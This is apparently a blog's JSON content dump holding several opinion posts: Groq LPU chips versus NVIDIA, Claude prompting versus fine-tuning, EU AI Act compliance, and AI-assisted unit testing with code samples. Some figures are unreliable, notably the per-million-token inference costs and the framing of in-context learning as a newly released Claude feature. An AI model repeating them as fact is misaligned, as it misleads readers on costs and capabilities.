Training still requires GPU-grade flexibility and massive parallel compute, and NVIDIA owns that space completely. Every organization training custom models is locked into NVIDIA.\nVertical integration. NVIDIA hasn\u0026rsquo;t just sold chips; they\u0026rsquo;ve built an ecosystem around them. CUDA, cuDNN, TensorRT, vendor relationships — they\u0026rsquo;ve made switching costs high by design. This is the same playbook that kept Intel dominant in processors for decades, though it ultimately faces the same long-term vulnerabilities.\nBut here\u0026rsquo;s what NVIDIA should be worried about: market segmentation. The AI compute market is big enough now that a competitor doesn\u0026rsquo;t need to beat NVIDIA everywhere. They just need to beat them in one specific segment with a 20-30% cost advantage and customers will switch. That\u0026rsquo;s what Groq has done.\nThe Real Competition: Cost Per Token # This is where the Groq story becomes interesting to infrastructure teams. The metric that matters in 2026 isn\u0026rsquo;t FLOPS or latency anymore — it\u0026rsquo;s cost per inference token. That\u0026rsquo;s what gets discussed in infrastructure planning meetings. That\u0026rsquo;s the number that goes into the spreadsheet when you\u0026rsquo;re deciding between systems.\nHere\u0026rsquo;s the economics: running inference on an H100 GPU costs roughly $0.0015 per 1M tokens (accounting for cloud provider markup, amortized hardware cost, energy, and overhead). Groq\u0026rsquo;s pricing is competitive at roughly $0.001 per 1M tokens, with some workload types running even cheaper.\nThe difference sounds small. But if you\u0026rsquo;re serving 100B tokens per month — which is conservative for a mid-size AI application at scale — that\u0026rsquo;s $150/month on GPUs versus $100/month on LPUs. Over a year, that\u0026rsquo;s $600. 
For a large operation serving 1T+ tokens monthly, the same per-token gap works out to roughly $500 a month, or about $6,000 a year, and it grows linearly with volume from there.\nMore importantly, those numbers are just the direct inference cost. The infrastructure around them is where the real savings compound. The broader shift toward efficient AI infrastructure is reshaping how teams evaluate compute. Building and maintaining a GPU inference cluster requires:\nSophisticated load balancing (because latency varies)\nComplex scheduling (because GPUs are power-hungry and require thermal management)\nSignificant engineering overhead\nPredictable power and cooling infrastructure investments\nLPU chips, with their lower power footprint and simplified architecture, reduce that complexity. A team I\u0026rsquo;ve been consulting with compared the total cost of ownership for a GPU inference setup versus Groq\u0026rsquo;s LPU platform. The GPU option was cheaper per-token at low volume. But at 10B tokens per month and beyond, Groq\u0026rsquo;s total infrastructure cost (hardware + engineering + power + cooling) was 25-30% lower.\nThat\u0026rsquo;s the wedge that opens the market.\nGroq\u0026rsquo;s Challenge: The Chicken-and-Egg Problem # Here\u0026rsquo;s what could stop Groq\u0026rsquo;s momentum: ecosystem and adoption.\nIf you\u0026rsquo;re building an AI application today, you probably start with OpenAI\u0026rsquo;s API or Anthropic\u0026rsquo;s API or use an open-source model with one of the standard inference servers (vLLM, TensorRT-LLM, etc.). Those systems are built on the assumption that GPUs are your target hardware. Switching to LPU-optimized inference isn\u0026rsquo;t a drop-in replacement: it requires new optimizations, new deployment patterns, new monitoring.\nGroq knows this. They\u0026rsquo;re partnering with major cloud providers and building integrations into popular frameworks. 
But the barrier is real: engineers are reluctant to switch away from a known system unless the advantages are overwhelming.\nThis mirrors what happened when AWS EC2 alternatives emerged: the gravitational pull of an established ecosystem kept most workloads in place, even when newer platforms offered advantages. Groq needs to make the switching cost low enough that the cost savings justify the engineering effort.\nThey\u0026rsquo;re making progress on this. But adoption will be slower than the technology deserves, which is typical for infrastructure transitions.\nThe Larger Pattern: Specialization Returns # This is part of a larger trend. For the past decade, the industry has moved toward generalization: buy one type of chip, one framework, one platform, and try to make it work for everything. It\u0026rsquo;s been the era of \u0026ldquo;one size fits all.\u0026rdquo;\nAI workloads are fracturing that narrative. Training requires one type of hardware. Real-time inference requires another. Batch processing requires a third. As the market matures, specialization is becoming cost-effective again. This is reminiscent of how infrastructure as code and containerization emerged: when the problem space became large enough, specialized tools beat general-purpose ones.\nGroq is betting on inference specialization. Other competitors will follow. Some of these bets will stick, some will fade. But the era of \u0026ldquo;buy NVIDIA for everything\u0026rdquo; is ending.\nWhat This Means for Teams Building AI # If you\u0026rsquo;re making AI infrastructure decisions right now, here\u0026rsquo;s what to consider:\nFor cost-sensitive inference: Evaluate Groq\u0026rsquo;s LPU platform seriously. If your workload is inference-heavy and latency tolerance is reasonable (500ms+), you could save 20-30% on compute costs. That\u0026rsquo;s worth a migration effort.\nFor latency-critical work: Stick with GPUs. Groq\u0026rsquo;s advantages are in throughput, not latency. 
If you\u0026rsquo;re serving real-time inference to end users (chat applications, autocomplete), GPUs remain the better choice.\nFor hybrid workloads: Many organizations do both training and inference. NVIDIA dominates training, so you\u0026rsquo;re locked into GPU infrastructure anyway. In that case, the question becomes: is the inference cost saving worth adding LPU infrastructure as a separate system? For some teams, the answer is yes. For others, the operational complexity isn\u0026rsquo;t worth the savings.\nFor startups: If you\u0026rsquo;re building a new inference-heavy service, Groq\u0026rsquo;s platform is worth evaluating from day one. You don\u0026rsquo;t have GPU infrastructure inertia. You can design your system around the hardware that\u0026rsquo;s most efficient for your workload.\nThe Supply Side: Can Groq Scale? # This is the question that determines whether Groq\u0026rsquo;s technology translates to market impact. Can they manufacture LPU chips at scale? Can they support the ecosystem that grows around them?\nGroq has partnerships with major cloud providers and is ramping manufacturing. But they\u0026rsquo;re a fraction of NVIDIA\u0026rsquo;s size. If demand surges (which it should, given the value proposition), can they deliver chips quickly? Or do customers wait months for delivery, at which point the advantage of cost savings diminishes?\nThis is where NVIDIA\u0026rsquo;s vertical integration actually helps them — they can ramp production to match demand. Groq has to execute a more delicate balance: prove demand, secure manufacturing capacity, deliver on promises. If they stumble on any of these, the market opportunity passes to the next competitor.\nMy Take # Groq\u0026rsquo;s LPU chips represent the first serious credible challenge to NVIDIA\u0026rsquo;s dominance in AI compute. 
Not because they\u0026rsquo;re universally better — they\u0026rsquo;re not — but because they\u0026rsquo;re specifically better for a workload that\u0026rsquo;s become increasingly important: cost-sensitive inference at scale.\nThe market is large enough and growing fast enough that there\u0026rsquo;s room for specialization. NVIDIA will remain dominant in training and low-latency inference. But in the emerging segment of high-throughput, cost-optimized inference, Groq has built something real.\nThe question isn\u0026rsquo;t whether Groq will replace NVIDIA. They won\u0026rsquo;t. The question is whether Groq will capture enough of the cost-sensitive inference market that NVIDIA feels compelled to optimize their GPU offerings for this workload specifically. In a healthy market, that\u0026rsquo;s the right outcome: competitors driving each other to be better at specific things, instead of one vendor dominating everything by default.\nWe\u0026rsquo;re watching the beginning of that fragmentation. For infrastructure teams, the golden age of \u0026ldquo;one type of compute for all workloads\u0026rdquo; is ending. The next era is about matching the right hardware to the right problem. 
Groq\u0026rsquo;s LPU chips are proof that the market is ready for that transition, and that NVIDIA\u0026rsquo;s lock on infrastructure isn\u0026rsquo;t as absolute as it looked six months ago.\n","date":"4 June 2026","externalUrl":null,"permalink":"/posts/260604-groq-lpu-chips-nvidia-challenge/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Groq’s custom LPU chips are becoming a credible alternative to NVIDIA GPUs for AI inference workloads, forcing infrastructure teams to rethink their compute strategies and challenging the GPU monopoly.","title":"Groq's LPU Chips — The Infrastructure Bet Against NVIDIA's GPU Dominance","type":"posts"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/hardware/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Hardware","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/series/industry--platforms/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Industry \u0026 Platforms","type":"series"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/categories/infrastructure/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Infrastructure","type":"categories"},{"content":"Anthropic dropped something quietly significant last month: Claude now supports what they\u0026rsquo;re calling \u0026ldquo;in-context learning,\u0026rdquo; a capability that lets you provide task-specific knowledge, examples, and context directly in the prompt without needing to fine-tune a model. If you\u0026rsquo;ve been managing fine-tuned models for the past year, treating them like precious, expensive assets, you\u0026rsquo;re about to rethink your entire infrastructure.\nI\u0026rsquo;ve been experimenting with this for the past few weeks, and the implications are profound. 
We\u0026rsquo;re not just getting a minor convenience feature here. We\u0026rsquo;re watching the economic model of AI tooling shift in real time.\nWhat Changed # The technical capability itself isn\u0026rsquo;t new — we\u0026rsquo;ve known for years that large language models can learn from in-context examples. What changed is scale and reliability. Claude\u0026rsquo;s 200K token context window (released earlier this year) finally makes it practical to pack in all the knowledge a model needs to perform a task correctly, and Anthropic\u0026rsquo;s latest refinement to in-context learning means the model actually uses that knowledge effectively, rather than drowning it out or forgetting it by the end of the prompt. This pattern has been consistent: as context gets cheaper and larger, static training becomes less necessary. This shift toward context efficiency is becoming a key competitive advantage.\nHere\u0026rsquo;s what you can now do: instead of fine-tuning Claude on 1,000 examples of your custom API documentation, you drop 500 examples into the context window along with the API schema, and the model performs just as well — sometimes better — because it\u0026rsquo;s reasoning over the actual current documentation rather than a snapshot from training time.\nThe practical difference: fine-tuning is historical knowledge. In-context learning is real-time knowledge.\nThis matters more than it sounds. If your API changes, you fine-tune again (3-5 days, thousands of dollars). With in-context learning, you update the prompt (15 minutes, marginal cost). If you\u0026rsquo;re running this for 10,000 API requests a month, the math starts to favor in-context learning almost immediately.\nWhy This Breaks Fine-Tuning Economics # For context: fine-tuning Claude costs around $3-8 per million tokens for training data preparation, then $0.60 per million tokens at inference time. It\u0026rsquo;s not prohibitively expensive, but it\u0026rsquo;s a commitment. 
You\u0026rsquo;re also locked into whatever snapshot of knowledge you fine-tuned on.\nIn-context learning, by contrast, costs about the same at inference time, but you pay only for the tokens you actually use. No training pipeline. No week-long waiting period. No version management nightmare when you realize you need to retrain on new information.\nI\u0026rsquo;ve been talking with teams that built fine-tuned models for code generation, customer support automation, and document analysis over the past year. Almost all of them are now asking: \u0026ldquo;Should we abandon our fine-tuned models and switch to in-context learning?\u0026rdquo; The answer, for most of them, is yes. Or at least: \u0026ldquo;Yes, for new projects. We\u0026rsquo;ll keep the fine-tuned ones as backup.\u0026rdquo; When the shift happens, it happens fast. The evolution of AI-powered development platforms shows how quickly these transitions reshape entire categories of tools, with the transition from traditional tooling to AI-first workflows happening almost overnight once the capability matures.\nThe Shift From Training-Time to Prompt-Time # This is the meta-insight: we\u0026rsquo;re moving from an era where \u0026ldquo;training your model\u0026rdquo; meant running a batch job to an era where \u0026ldquo;training your model\u0026rdquo; means writing a good prompt.\nThat sounds like a downgrade — shouldn\u0026rsquo;t specialized training be better than a prompt? — but here\u0026rsquo;s why it\u0026rsquo;s an upgrade:\nPrompt engineering is faster and cheaper than fine-tuning. This was already true, but in-context learning with a large window makes it dramatically true. You can iterate a prompt in hours instead of days.\nYour knowledge stays current. Fine-tuning is point-in-time. In-context learning is real-time. If your API documentation updated yesterday, your in-context learning model knows about it today. Your fine-tuned model doesn\u0026rsquo;t, unless you retrain.\nDebugging is easier. 
If a fine-tuned model fails on a specific case, you don\u0026rsquo;t know why — it\u0026rsquo;s a black box of gradient descent. If an in-context learning prompt fails, you can see exactly what context was provided and why the model made the wrong decision. You can fix it immediately. This transparency is essential for building reliable AI systems where explainability matters.\nCosts scale sublinearly instead of linearly. With fine-tuning, each new task is a separate training job. With in-context learning, you can pack multiple tasks into a single prompt, and the model handles them correctly (we\u0026rsquo;re learning).\nPractical Implications for Teams # If you\u0026rsquo;re building AI-powered applications right now, here\u0026rsquo;s what this means:\nFor new projects: Don\u0026rsquo;t fine-tune. Use in-context learning with a 200K token context window. Build your prompts with real examples, your actual API schema, and task-specific instructions. This is faster to develop, cheaper to run, and easier to iterate on. AI-assisted testing frameworks demonstrate how in-context learning reshapes QA pipelines and powers the next generation of coding tools.\nFor existing fine-tuned models: Audit them. If the fine-tuning provides real value that couldn\u0026rsquo;t be replicated with a good prompt and full context, keep it. But if it\u0026rsquo;s mostly there because \u0026ldquo;we needed better performance than a raw prompt,\u0026rdquo; migrate to in-context learning. You\u0026rsquo;ll simplify your infrastructure and probably reduce costs.\nFor data infrastructure: You\u0026rsquo;re going to need robust systems for managing context. If your prompt includes 50,000 tokens of examples and documentation, you need rock-solid tooling to assemble, version, and update those context windows. This is the new bottleneck — not training, but context composition. 
The infrastructure patterns here resemble what we\u0026rsquo;re seeing with model context protocol adoption across the AI ecosystem.\nFor governance and compliance: As AI systems become more powerful through in-context learning, regulatory frameworks like the EU AI Act will increasingly focus on the data and context used in prompts rather than model weights. This represents a fundamental shift in how we think about AI responsibility, audit trails, and data provenance.\nI\u0026rsquo;ve been consulting with teams on this transition, and the ones moving fastest are treating their prompt context like version-controlled code. They\u0026rsquo;re storing examples in repositories, reviewing changes to task-specific instructions, and testing different context configurations. Extended thinking models like Claude 3.7 Sonnet take this even further, letting the model reason over context more deliberately — which pairs beautifully with well-structured in-context learning. This capability is driving the emergence of agent-based systems that can handle increasingly complex reasoning tasks without explicit fine-tuning.\nFor teams building with these models, agent-based system architecture patterns show how to integrate in-context learning into autonomous systems (see also the Sub-Hub section below for broader context on model evolution).\nThe Integration Opportunity # The real power comes from combining in-context learning with other advanced capabilities. Computer use alongside in-context learning enables agents to interact directly with systems while referencing real-time context. This combination is more powerful than either capability alone.\nThe Cost Story # Let me be concrete about the economics. A team I worked with had been running a fine-tuned code-completion model for 6 months. Training cost: $8,000 upfront. Inference cost: $2,400/month for 50M tokens at inference time. They were committed.\nWe ran an experiment with in-context learning instead. 
Same 50M tokens, but now the tokens included 1,000 examples and their full codebase structure as context. Inference cost: $2,300/month. Performance was better because the model was working with the current codebase, not a training snapshot.\nThe team abandoned the fine-tuned model. Now they\u0026rsquo;re saving the marginal cost of training, gaining the benefit of real-time knowledge, and actually spending less on inference. That\u0026rsquo;s a rare trifecta.\nNot every team will have that experience. Some will find that fine-tuning was solving a problem that in-context learning can\u0026rsquo;t replicate (specialized domain knowledge that requires actual training). But many will find that what they thought required fine-tuning was just \u0026ldquo;we need to feed the model the right context.\u0026rdquo; Broader context and reasoning capabilities are replacing the need for narrow task-specific training.\nSub-Hub: AI/LLM Models and Capabilities # For a broader exploration of how AI models are evolving, including extended thinking, reasoning models, and the trajectory of model development, see AI/LLM Models \u0026amp; Capabilities Evolution. This sub-hub connects in-context learning to the broader evolution of model capabilities.\nMy Take # We\u0026rsquo;re at an inflection point in how we build AI systems. For the past 2-3 years, fine-tuning was the obvious path if you needed model customization. You had no choice — the context windows were too small and too expensive to use them as your primary customization mechanism.\nThat world is ending.\nIn-context learning with large, reliable context windows is good enough for most tasks, and it\u0026rsquo;s faster and cheaper and more flexible than fine-tuning. Anthropic\u0026rsquo;s latest release makes that transition practical. The next twelve months will see teams migrating away from fine-tuning. 
When the commercial incentive aligns with technical capability, adoption accelerates, shifting the focus from model customization to prompt and context design.\nThis means the skill that matters now is prompt engineering at scale — knowing how to structure context, how to select the right examples, how to version and test your prompts the way you\u0026rsquo;d version and test code. The teams that get good at that will build the best AI applications. The teams that are still thinking about fine-tuning as the primary customization mechanism will find themselves maintaining complex infrastructure for a problem that in-context learning just\u0026hellip; solves.\nAnthropic has basically given us all a toolkit to stop overthinking model customization and start focusing on real problems. This shift toward prompt-centric development will accelerate as context windows grow and models become more capable at reasoning over provided information rather than memorizing patterns from training.\n","date":"2 June 2026","externalUrl":null,"permalink":"/posts/260602-claude-in-context-learning/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s latest Claude breakthrough lets developers inject task-specific knowledge directly into prompts without fine-tuning, fundamentally shifting how we build AI-powered applications.","title":"Claude's In-Context Learning — The End of Fine-Tuning as We Know It","type":"posts"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/series/ai-industry--regulation/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Industry \u0026 Regulation","type":"series"},{"content":"AI regulation is here, and it\u0026rsquo;s not going away. The EU AI Act represents the most comprehensive regulatory framework, but other jurisdictions are following. 
For teams building AI systems, understanding the compliance landscape is no longer optional.\nThe EU AI Act Framework # The EU AI Act compliance requirements establish a risk-based approach: prohibited systems, high-risk systems with substantial requirements, and general systems with lighter oversight. Understanding which category your system falls into is the first step.\nHigh-risk systems — those influencing consequential decisions — require documentation, testing, human oversight, and monitoring. This isn\u0026rsquo;t bureaucracy for its own sake. These requirements force teams to think through their systems carefully before they reach production.\nThe Act has been evolving since 2021, giving teams time to understand requirements. Teams that started early have implementation experience. Those starting now need to catch up quickly.\nGeneral-Purpose AI (GPAI) Requirements # GPAI compliance creates a separate set of obligations for model providers. Technical documentation, copyright compliance, and training data summaries must be provided. This affects both model providers and teams building on top of general-purpose models.\nAs a deployer, you\u0026rsquo;re responsible for how you use these models. If you build a high-risk application on top of a general-purpose model, you\u0026rsquo;re still responsible for application-level compliance, regardless of what the model provider does.\nPractical Implementation Patterns # Building compliant systems means observability first. OpenTelemetry provides the foundation for comprehensive logging, and you need every inference call logged with full context. These logs are your audit trail.\nSupply chain security becomes important in this context. Know where your models come from, how they were built, and what guarantees they provide. 
For teams building custom models, SLSA principles apply to your training pipeline as much as your application code.\nGovernance by Design # The best teams bake compliance into their development process rather than bolting it on later. This means:\nBias and fairness testing as part of CI/CD Documentation standards that match regulatory requirements Monitoring and alerting for anomalous behavior Human-in-the-loop for uncertain predictions Version control for training data and models This discipline is exactly what teams should be doing anyway. The regulation is mandating good engineering practices.\nAI-Specific Development Tools # AI-assisted testing helps validate AI system behavior. AI-powered development tools need their own compliance considerations when they\u0026rsquo;re used to build systems affecting users.\nUnderstanding how in-context learning affects your compliance obligations matters. If your system\u0026rsquo;s behavior depends on prompt context, you need to version and control that context as carefully as you do model weights.\nAgent Systems and Autonomous Decision-Making # Agent-based systems that make consequential decisions autonomously face serious compliance challenges. The EU AI Act\u0026rsquo;s requirements around human oversight and explainability become central to system design.\nTeams building agents need to implement robust audit trails, override mechanisms, and escalation pathways from the start. The ability to understand why an agent made a particular decision is fundamental to both compliance and operational reliability.\nBroader Regulatory Landscape # The EU AI Act is just the beginning. Different jurisdictions are developing their own approaches. The broader regulatory landscape includes data privacy regulations, safety standards, and industry-specific requirements.\nTeams should monitor regulatory developments in the jurisdictions they serve. 
Compliance is increasingly a business consideration, not just a legal checkbox.\nSupply Chain and Third-Party Considerations # Using third-party models and services doesn\u0026rsquo;t eliminate your responsibility. You need to understand what you\u0026rsquo;re using, what guarantees it provides, and how to monitor it in production. This is supply chain security applied to AI.\nBuilding Resilient and Responsible Systems # Responsible AI development practices protect both users and organizations. They reduce liability, build trust, and create systems that can operate confidently in regulated environments.\nThe teams that embrace this mindset early will have competitive advantages:\nFaster time to market in regulated environments Lower liability exposure Better relationships with customers and regulators More reliable systems overall My Take # Compliance doesn\u0026rsquo;t kill innovation. It channels it. Teams that see EU AI Act requirements as constraints miss the opportunity: these requirements push teams toward building more thoughtful, carefully designed systems.\nThe regulation is also stable and long-term. Unlike privacy laws that shift with political winds, the AI Act represents a sustained commitment to a risk-based approach. Teams that invest in compliance infrastructure now will benefit from that investment for years.\nThe next frontier is probably sector-specific regulations building on top of the baseline AI Act. Financial services, healthcare, and critical infrastructure will have additional requirements. 
Teams in these sectors should be thinking about compliance architecture now.\nThe world of AI development is shifting from \u0026ldquo;ship fast and deal with consequences\u0026rdquo; to \u0026ldquo;ship responsibly and operate confidently.\u0026rdquo; That\u0026rsquo;s a good shift for everyone involved.\n","date":"30 May 2026","externalUrl":null,"permalink":"/posts/260530-ai-regulation-compliance-frameworks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Navigate AI regulation frameworks: EU AI Act, GPAI compliance, supply chain security, and building AI systems with governance by design.","title":"AI Regulation \u0026 Compliance Frameworks — Building Responsible AI Systems","type":"posts"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/tags/compliance/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Compliance","type":"tags"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/tags/regulation/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Regulation","type":"tags"},{"content":"AI testing tools have moved from novelty to practical productivity tool in the past six months. But there\u0026rsquo;s a gap between \u0026ldquo;AI can generate tests\u0026rdquo; and \u0026ldquo;AI helps you write better tests.\u0026rdquo;\nThe honest truth: most AI-generated tests are mediocre. They test happy paths, they miss edge cases, and they often create false confidence. But used strategically, modern AI capabilities can elevate your test quality and catch issues human-written tests miss.\nLet me walk through what actually works, what doesn\u0026rsquo;t, and how to build a testing strategy that leverages AI without getting burned.\nThe AI Testing Landscape in 2026 # The tooling has matured significantly. 
You\u0026rsquo;ve got:\nTest generation tools (Sapienz, Diffblue, TestRx) that generate synthetic tests from code LLM-powered test writers (GitHub Copilot, Claude, ChatGPT) that write tests from requirements Property-based testing helpers (Hypothesis, QuickCheck with AI extension) that discover edge cases Behavior validation tools that check if code matches intended behavior Regression test generation that automatically creates tests from failed behavior The state of the art: AI can reliably generate unit tests for well-defined functions. It struggles with integration tests, stateful code, and timing-dependent logic. It\u0026rsquo;s good at finding obvious missing edge cases. It\u0026rsquo;s bad at finding subtle, domain-specific edge cases.\nMost importantly: the quality of AI-generated tests depends heavily on how you prompt and what you validate afterward.\nUnit Test Generation: Where AI Excels # AI is genuinely good at generating unit tests for pure functions. Here\u0026rsquo;s a realistic example:\nYou have a function:\nfunction parseProductCode(code: string): { category: string; sku: number; variant: string; } | null { const match = code.match(/^([A-Z]{2})(\\d{4})([A-Z]?)$/); if (!match) return null; return { category: match[1], sku: parseInt(match[2], 10), variant: match[3] || \u0026#34;DEFAULT\u0026#34;, }; } An AI model prompt:\nGenerate comprehensive unit tests for this function. Include valid inputs, invalid formats, boundary cases, and edge cases. Use Jest format. Aim for 95%+ code coverage. 
Result (from Claude):\ndescribe(\u0026#34;parseProductCode\u0026#34;, () =\u0026gt; { it(\u0026#34;parses valid product codes\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AB1234A\u0026#34;)).toEqual({ category: \u0026#34;AB\u0026#34;, sku: 1234, variant: \u0026#34;A\u0026#34;, }); }); it(\u0026#34;returns null for invalid formats\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;invalid\u0026#34;)).toBeNull(); expect(parseProductCode(\u0026#34;\u0026#34;)).toBeNull(); expect(parseProductCode(\u0026#34;A12345B\u0026#34;)).toBeNull(); // Too many digits }); it(\u0026#34;handles missing variant\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AB1234\u0026#34;)).toEqual({ category: \u0026#34;AB\u0026#34;, sku: 1234, variant: \u0026#34;DEFAULT\u0026#34;, }); }); it(\u0026#34;handles boundary cases\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AA0000\u0026#34;)).toEqual({ category: \u0026#34;AA\u0026#34;, sku: 0, variant: \u0026#34;DEFAULT\u0026#34;, }); expect(parseProductCode(\u0026#34;ZZ9999Z\u0026#34;)).toEqual({ category: \u0026#34;ZZ\u0026#34;, sku: 9999, variant: \u0026#34;Z\u0026#34;, }); }); it(\u0026#34;rejects lowercase letters\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;ab1234A\u0026#34;)).toBeNull(); }); it(\u0026#34;rejects numbers in category\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;1A1234A\u0026#34;)).toBeNull(); }); }); This is\u0026hellip; actually good. The AI found the boundary cases, tested the happy path, and covered the regex branches. The coverage would be 95%+.\nCould you have written this yourself? Sure. Did AI save you 15 minutes? Absolutely. Is this a better use of AI than \u0026ldquo;generate all my tests for me\u0026rdquo;? 
Absolutely.\nWhere AI Testing Falls Short # Now here\u0026rsquo;s a realistic example where AI struggles—stateful, time-dependent code where agent-based systems might have more success, but simpler unit tests still need human oversight. A more complex function:\nclass UserRepository { private cache: Map\u0026lt;string, User\u0026gt; = new Map(); private cacheTTL = 5 * 60 * 1000; // 5 minutes async getUser(id: string): Promise\u0026lt;User | null\u0026gt; { const cached = this.cache.get(id); if (cached \u0026amp;\u0026amp; Date.now() - cached.timestamp \u0026lt; this.cacheTTL) { return cached; } const user = await db.getUserById(id); if (user) { this.cache.set(id, { ...user, timestamp: Date.now() }); } return user || null; } invalidateCache(id: string) { this.cache.delete(id); } } AI will generate:\nit(\u0026#34;returns cached user within TTL\u0026#34;, async () =\u0026gt; { const user = { id: \u0026#34;123\u0026#34;, name: \u0026#34;Alice\u0026#34;, timestamp: Date.now() }; repo.cache.set(\u0026#34;123\u0026#34;, user); const result = await repo.getUser(\u0026#34;123\u0026#34;); expect(result).toEqual(user); }); This test passes. But it doesn\u0026rsquo;t test:\nCache expiration after TTL — The AI didn\u0026rsquo;t realize it needs to mock time or advance the clock Concurrent requests — What happens if two requests hit before cache is populated? Cache invalidation ordering — What if cache is invalidated between the DB query and cache write? Memory leaks — Does the cache grow unbounded? Human instinct catches these because you\u0026rsquo;ve debugged concurrency issues before. AI doesn\u0026rsquo;t have that pattern recognition for stateful, time-dependent code.\nA Practical AI Testing Strategy # Here\u0026rsquo;s what actually works:\n1. 
Use AI for Test Scaffolding, Not Complete Test Suites # Don\u0026rsquo;t ask AI to \u0026ldquo;generate all tests.\u0026rdquo; Ask it for specific things:\nGenerate test cases for these scenarios: - Valid input with no whitespace - Valid input with leading/trailing whitespace - Input with special characters - Empty input - Null input - Input exceeding maximum length (500 chars) Use Jest format. This is much more effective than \u0026ldquo;generate comprehensive tests.\u0026rdquo; You\u0026rsquo;re directing the AI, not hoping it figures out what matters.\n2. Use AI for Edge Case Discovery # This is where AI shines. Prompt it like this:\nI have this function [code]. Generate 10 edge cases I might not have thought of. For each one, explain why it\u0026#39;s interesting, then provide a Jest test case. The AI will often find clever edge cases:\nOff-by-one errors in ranges Unicode handling edge cases Floating-point precision issues Timezone/locale edge cases State transition problems 3. Pair AI Test Generation with Mutation Testing # Use mutation testing tools (Stryker, PIT) alongside AI test generation. Mutation testing injects bugs and sees if your tests catch them. If AI-generated tests don\u0026rsquo;t catch injected mutations, you know they\u0026rsquo;re weak.\nnpx stryker run # If coverage is 80% but mutations killed is 65%, # your tests have gaps. Ask AI to fill them. 4. Use AI for Test Documentation # AI is good at explaining what tests do:\n// Before: unclear why this test exists it(\u0026#34;test_user_status\u0026#34;, () =\u0026gt; { expect(user.getStatus()).toBe(\u0026#34;ACTIVE\u0026#34;); }); // After: ask AI to document it /** * Verifies that a user with an active subscription * and completed profile reports status as ACTIVE. * This test catches regressions where status logic * changed to include email verification. */ it(\u0026#34;returns ACTIVE status when subscription is valid and profile complete\u0026#34;, () =\u0026gt; { // ... }); 5. 
Use AI for Regression Test Generation # When a bug reaches production, AI can help generate tests to prevent it from recurring:\nWe had a bug where [describe the bug]. The root cause was [explain it]. Generate a test case that would catch this bug. This is highly effective. The AI has your failure description and can work backward to create a test that would fail on the buggy code but pass on the fix. This approach pairs well with how advanced AI models like Claude handle complex reasoning tasks, where the model reasons through the problem space rather than memorizing patterns.\nCombining AI with Property-Based Testing # Property-based testing is powerful. Combined with AI, it\u0026rsquo;s even better:\nimport fc from \u0026#34;fast-check\u0026#34;; // Hypothesis is a Python library; fast-check is used here as a JavaScript/TypeScript counterpart // Arbitrary for valid codes: two uppercase letters, four digits, optional variant letter const validCode = fc.stringMatching(/^[A-Z]{2}\\d{4}[A-Z]?$/); // AI helps generate properties describe(\u0026#34;parseProductCode properties\u0026#34;, () =\u0026gt; { it(\u0026#34;valid codes parse without error\u0026#34;, () =\u0026gt; { fc.assert( fc.property(validCode, (code) =\u0026gt; { // Property: result should never be null for valid codes expect(parseProductCode(code)).not.toBeNull(); }) ); }); it(\u0026#34;parsed SKU is always between 0 and 9999\u0026#34;, () =\u0026gt; { fc.assert( fc.property(validCode, (code) =\u0026gt; { const result = parseProductCode(code); expect(result!.sku).toBeGreaterThanOrEqual(0); expect(result!.sku).toBeLessThanOrEqual(9999); }) ); }); }); The AI helps you articulate properties that must be true about your code. 
The testing framework verifies them across many generated inputs.\nThe AI Testing Workflow in Practice # Here\u0026rsquo;s what I recommend for a real project:\nWrite core logic tests manually — You understand the requirements, write the tests Ask AI for edge cases — \u0026ldquo;What am I missing?\u0026rdquo; prompt Use AI to generate scaffolding — For repetitive test patterns Run mutation testing — See if AI + your tests actually catch bugs Document with AI — Clarify what each test validates Review all AI tests before committing — Don\u0026rsquo;t trust blindly This workflow takes maybe 30% longer than writing tests manually, but your test quality is significantly higher.\nTools Worth Using in 2026 # GitHub Copilot Chat — Good for quick test generation, especially for scaffolding Claude — Better at understanding complex logic and suggesting edge cases Stryker — Mutation testing to validate test quality Hypothesis (Python) or fast-check (JavaScript/TypeScript) — Property-based testing, especially good when combined with LLMs Sapienz — Automated test generation from code (enterprise) My Take # AI-assisted testing isn\u0026rsquo;t about automating tests away. It\u0026rsquo;s about raising the quality and coverage floor while keeping the interesting work human. This fits into the broader pattern of how development practices are evolving — tools like AI, property-based testing, and mutation testing are reshaping how we approach quality assurance.\nThe mistake teams make: treating AI test generation as a product feature. \u0026ldquo;We have AI tests now!\u0026rdquo; Nope. You have scaffolding. The real testing still requires human judgment.\nThe wins come from using AI as a productivity tool:\nScaffold tests faster Find edge cases you\u0026rsquo;d miss Document test intent Validate test quality with mutation testing Used this way, AI can legitimately improve your test suite quality while cutting the time you spend on repetitive test scaffolding. Used blindly, it creates false confidence and technical debt.\nStart small. 
